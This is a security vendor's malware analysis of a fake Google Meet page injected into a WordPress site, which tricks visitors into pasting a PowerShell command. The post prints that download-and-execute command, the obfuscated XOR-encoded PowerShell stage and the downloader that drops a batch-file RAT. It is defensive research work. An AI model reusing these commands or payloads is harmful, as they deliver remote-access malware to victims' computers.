Last month, a customer reached out to us after noticing suspicious URLs on their WordPress site. Visitors reported being prompted to perform unusual actions.
We began our investigation, scanning the site for common malware indicators and looking for signs of obfuscated JavaScript or injected iframes. What we found, however, was more subtle and potentially more dangerous.
We have seen similar infections previously where the attacker would ask the users to run PowerShell commands on their system.
What Did We Find?
We discovered an HTML file meticulously crafted to resemble the Google Meet interface. This fake Google Meet page doesn’t present a login form to steal credentials directly. Instead, it employs a social engineering tactic, presenting a fake “Microphone Permission Denied” error and urging the user to copy and paste a specific PowerShell command as a “fix.”
We published an article in March where we discussed similar tactics being used in the fake CloudFlare overlays.
Analysis of the Code
The HTML Part
The code presents a social engineering attack using a malicious HTML page disguised to trick users into executing a PowerShell command that downloads and runs a RAT.
Social Engineering via Fake Error Message
The code attempts to socially engineer the user by displaying a fake error message.
micButton.addEventListener("click", function() { if (!micPermissionGranted) { navigator.mediaDevices.getUserMedia({ audio: true }) .then(function(stream) { stream.getTracks().forEach((track) => track.stop()); micPermissionGranted = true; micMuted = false; updateButton(micButton, micOnSrc, unmutedColor); const extraButton = document.querySelector(".extra-button"); if (extraButton) { updateExtraButton(extraButton); } }) .catch(function(error) { console.error("Microphone permission denied:", error); }); } else { micMuted = !micMuted; if (micMuted) { updateButton(micButton, micOffSrc, mutedColor); } else { updateButton(micButton, micOnSrc, unmutedColor); } } });
While the code does try to access the microphone, the error and the subsequent “fix” are likely fabricated to manipulate the user.
The key point is that the displayed error message, claiming “Microphone permission denied,” is used as a pretext to convince the user that something is wrong and needs fixing.
The “Ready to Join?” Section and the Fake Error Modal
On the right side of the fake Google Meet interface, the user is presented with a section enticing them to join:
<div class="right-panel"> <div class="ready-title">Ready to join?</div> <button class="join-btn" id="openModalBtn">Join now</button> <button class="other-ways"> Other ways to join <span class="arrow-down">▼</span> </button> </div>
This is the primary button that, when clicked, triggers the display of the first modal. When the “Join now” button is clicked, the following modal is displayed:
<div class="overlay" id="overlay"> <div class="modal"> <h3 class="modal-title">Can't join the meeting</h3> <p class="modal-message" id="modalMessage"> Sorry, an error has occurred when </br> joining the meeting. </p> <button class="modal-fix-button" id="fixButton" onclick="copyToClipboard()">Try Fix</button> </div> </div>
The “Fix” Button’s Action: Delivering the Malicious Payload
function copyToClipboard() { const text = 'powershell -w 1 iwr hxxp://[REDACTED]/1/XR.txt -UseBasicParsing|iex # Verification ID: 116772'; navigator.clipboard.writeText(text) }
When the user clicks the “Try Fix” button, the copyToClipboard() function is executed:
As we detailed before, this function silently copies a malicious PowerShell command to the user’s clipboard. The subsequent JavaScript within the fixButton.addEventListener then likely guides the user to open PowerShell and paste the command:
const fixButton = document.getElementById('fixButton'); const modalMessage = document.getElementById('modalMessage'); fixButton.addEventListener('click', () => { modalMessage.innerHTML = ` Press the Windows key <img [likely an image of the Windows key] and type <b>powershell</b> then press Enter. <br><br> Paste the following command (Ctrl+V or right-click then Paste) and press Enter: <pre>powershell -w 1 iwr hxxp://[REDACTED]/1/XR.txt -UseBasicParsing|iex # Verification ID: 116772</pre> `; });
The Actual Malware Part
Malicious Payload Found in XR.txt
These are the payload files designed to be executed manually by victims who are being socially engineered into trusting the fake Google interface. The attackers host the payload on the infected website itself rather than grabbing it from a third party server or website. The XR.txt file contains an obfuscated PowerShell script designed to decode itself at runtime and execute malicious code directly in memory.
Social Engineering Decoy
The script begins by displaying a “Verification complete!” message box to the user. This is a social engineering tactic to reassure the victim that their action (which led to the execution of this script) was successful and legitimate, while the malicious operations continue in the background.
Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.MessageBox]::Show('Verification complete!', 'Information', [System.Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Information);
Obfuscated Malicious Command Execution
The core malicious functionality is hidden within a heavily obfuscated PowerShell command. This part of the script dynamically decodes and executes a further malicious payload.
$udVDkdtSF =([regex]::Matches('6b677a6a767672382d2d63606b6c65766d6c2f63767272632c6d70652d7460712d6c6d636c766b2f746f2c606376264f5854557a5146223f2226676c7438437272466376633964776c61766b6d6c226d714144696b48432a26765341542e22264a6a61752b796177706e222676534154222f6d22264a6a61757f3964776c61766b6d6c2271504a4764562a2b7964776c61766b6d6c22537a68634147402a264e46776e755074587a2b796b642a232a566771762f5263766a222f5263766a22264a6a61752b2b796d714144696b484322264e46776e755074587a22264a6a61757f7f264a6a6175223f2226676c743843727246637663222922255e6c6d636c766b2f746f2c6063762539537a686341474022267766544669667651442c5177605176706b6c652a312e36312b39717663707622264a6a6175397f71504a47645639','.{2}') | % { [char]([Convert]::ToByte($_.Value,16) -bxor '2') }) -join '';& $udVDkdtSF.Substring(0,3) $udVDkdtSF.Substring(46);exit;Command Execution:
Finally, the script uses the PowerShell invocation operator & to execute a command constructed from two substrings of the de-obfuscated string $udVDkdtSF:
& $udVDkdtSF.Substring(0,3) $udVDkdtSF.Substring(46);exit;That php code lodged in the txt file is XOR encoded hex malware which runs the powershell command and installs the noanti-vm.bat RAT into AppData.
http://[REDACTED].org/vbs/noanti-vm.bat
$MZVWxSD = $env:AppData; function osCFkiJA($tQCV, $Hhcw){ curl $tQCV -o $Hhcw }; function sRHEfT(){ function QxjaCEB($LDulwRvZx){ if (!(Test-Path -Path $Hhcw)){ osCFkiJA $LDulwRvZx $Hhcw } } $Hhcw = $env:AppData + '\\noanti-vm.bat'; QxjaCEB $udVDkdtSF.SubString(3,43) }
The noanti-vm.bat RAT malware
The file noanti-vm.bat, is a heavily obfuscated Windows batch script. This file is detected as Trojan or RAT on VirusTotal.
Right from the beginning, the batch file uses a tactic that’s common in evasive malware: string slicing and environment variable trickery. It declares a large number of environment variables with random-looking names and assigns them gibberish-like values:
These variables don’t serve any meaningful purpose individually. However, the script later references individual characters from these variables using this syntax:
%VariableName:~index,1%This technique allows the attacker to construct real commands letter by letter from scattered, innocent-looking values. For example, the command:
%UMOGM:~2,1%%FkYBZvOHArkFVTJLVCDt:~6,1%%ZeGUDpukA:~2,1%...Decodes to:
SeTLOCaL EnableDeLayEDEXpaNSionThis enables delayed variable expansion in the batch environment, allowing further dynamic command building.
Motive Behind This Malware
This phishing page is crafted to manipulate human behavior, not browser behavior. The attacker isn’t stealing passwords through fake forms. Instead, they rely on the user to run a PowerShell script, which likely downloads and executes malware or opens a RAT.
The attackers are driven by the desire to gain control of the victim’s computer. They employ social engineering through a fake Google Meet interface to trick users into executing a malicious PowerShell command. This command acts as a gateway, allowing the attackers to download and install further malware. The deception aims to exploit user trust and a willingness to troubleshoot perceived errors, ultimately leading to unauthorized access and control for malicious purposes.
Impact of the Malware
The malware’s impact is potentially devastating. Successful execution of the PowerShell command enables attackers to download and run arbitrary code, leading to severe consequences. This can include the installation of various forms of malware like ransomware or keyloggers, the theft of sensitive data, and complete system compromise. The deceptive nature of the attack makes it highly effective in granting attackers access for a range of malicious activities.
The Silent Tactic: No Scripts, No Requests
What makes this fake Google Meet file more dangerous than many we’ve seen is its self-contained nature:
- All styles, logos, and layouts are embedded
- No external JavaScript files are called
- No Google resources or analytics scripts are loaded
The attacker knew what they were doing, they created a file that looks completely harmless in source code, unless you look very closely.
The Stark Reality: One Wrong Paste Can Cost You Everything
This fake Google Meet isn’t just a harmless prank or a minor inconvenience. It represents a significant threat vector where a seemingly simple action – copying and pasting a command can lead to a complete compromise of your computer. The attackers are betting on the users trust and their desire to quickly resolve a perceived technical issue. By understanding the mechanics of this attack and remaining vigilant, we can significantly reduce the risk of falling victim to this dangerous deception. Staying informed, staying cautious, and always thinking twice before running commands from untrusted sources. Our digital safety depends on it.
Remediation Steps
- Regularly Scan for Malware: Implement automated security scans to detect any unauthorized file uploads or code injections.
- Keep Software Updated: Patch all website software (CMS, plugins, themes) promptly to prevent exploitation of vulnerabilities.
- Enforce Strong Access Controls: Use strong passwords, limit user privileges, and consider two-factor authentication for all logins.
- Validate User Inputs: Sanitize and validate all user-supplied data to prevent code injection attacks.
- Implement a Web Application Firewall (WAF): A WAF can help filter out malicious traffic and block common attack vectors.
Conclusion
Through a deceptive Google Meet deception, this HTML code attempts to induce users into executing a malicious PowerShell command. The potential consequences, including the download and execution of harmful code, highlight the critical responsibility users bear in verifying the legitimacy of websites and exercising caution when presented with technical instructions.
If your site has been compromised or you’re unsure whether your environment is secure, Sucuri is here to help.
Rodrigo Escobar
Cesar Anjos
Caleb Lane
Fernando Barbosa
Ben Martin
Daniel Cid
Matt Morrow
John Castro
Krasimir Konov